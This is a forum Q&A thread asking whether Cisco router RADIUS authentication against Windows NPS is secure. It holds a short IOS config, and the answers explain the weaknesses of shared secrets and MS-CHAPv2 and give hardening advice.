Using Windows NPS for Cisco router aaa authentication - is this safe?

Question

I setup RADIUS authentication on a Cisco router and pointed it to a Windows NPS. Now I can ssh into the router my with AD account YAY.

But now that I got it working I'm going over the settings to make sure everything is secure.

On my router the config is pretty simple:

aaa new-model
aaa group server radius WINDOWS_NPS
server-private 123.123.123.123 auth-port 1812 acct-port 1813 key mykey
aaa authentication login default local group WINDOWS_NPS

ip domain-name MyDom
crypto key generate rsa

(under vty and console)# login authentication default

On the Windows NPS:

I created a new RADIUS client for the router.
Created a shared secret and specified Cisco as Vendor Name.
Created a new Network Policy with my desired conditions.
And now the part of the Network Policy config that worries me:

enter image description here

I read that Cisco only supports the unencrypted method, but I thought that using any authenticate method here that does NOT use certificates is incredibly insecure (even MS-CHAP-v2 is said to be super insecure).

So are my AD credentials being sent over the wire in plain text?

My other question is that if a hacker gets my RADIUS shared secret what do they really have? If the shared secret gets compromised must I generate a new one on all of my routers?

What makes you think using certificates and MS-CHAPv2 is insecure? That makes no sense. — gparent, Feb 19 '15 at 18:54
Oops typo. "...does *NOT* use certificates...". MS-CHAPv2 is very crackable- according all the articles I've read at least. — red888, Feb 19 '15 at 20:15
Which is why you use certificates, so that the MS-CHAPv2 handshake isn't captured by the attacker. It's safe. — gparent, Feb 19 '15 at 20:31
Also you might want to look at using the new aaa syntax on IOS. — cpt_fink, Mar 02 '15 at 00:43

score 1 · Answer 1 · answered Aug 07 '15 at 17:17

First, I know this is old'ish but want to clear the record for posterity.

You are right to be VERY concerned however neither Cisco nor any other vender seems that interested in fixing the issues you identified. When using RADIUS (or TACACS+) for authentication your password is encrypted using the shared key you configured. Note that the shared key is stored as a type-7 in the config meaning anyone with the config can crack the type 7 and recover the key. Plug the key into wireshark and all your passwords and two-factor PINS become instantly broken. Furthermore, the encryption used by RADIUS and TACACS+ is based on MD5 hashes which are considered very insecure so brute forcing a secret is not out of the question.

At this point the best you can do is ensure that the keys you use are very strong. I would recommend using something like https://www.random.org/passwords/ and generate unique keys at least 12 characters long which SHOULD make brute forcing the keys impossible.

Also, ensure that only trusted individuals have the config and are able to see the RADIUS or TACACS+ shared secret.

Thirdly, watch for new versions of switch IOS late this year to support a feature called "Secure Reversible Passwords for AAA". This is currently supported on very late code for ISR routers and securely encrypts the key, eliminating some of that vulnerability.

Lastly, complain LOUDLY to Cisco and other vendors about these issues. MY recommended solutions are universal support for MSCHAPv2 which IS breakable (DES equivalent) but still far better then clear text and support for REAL encryption, either by using the existing PEAPv1-MSCHAPv2 and PEAPv1-GTC algorithms on the client side, creation of STACACS+ (TACACS over SSL) or implementation of DIAMETER.

Using Windows NPS for Cisco router aaa authentication - is this safe?

1 Answers1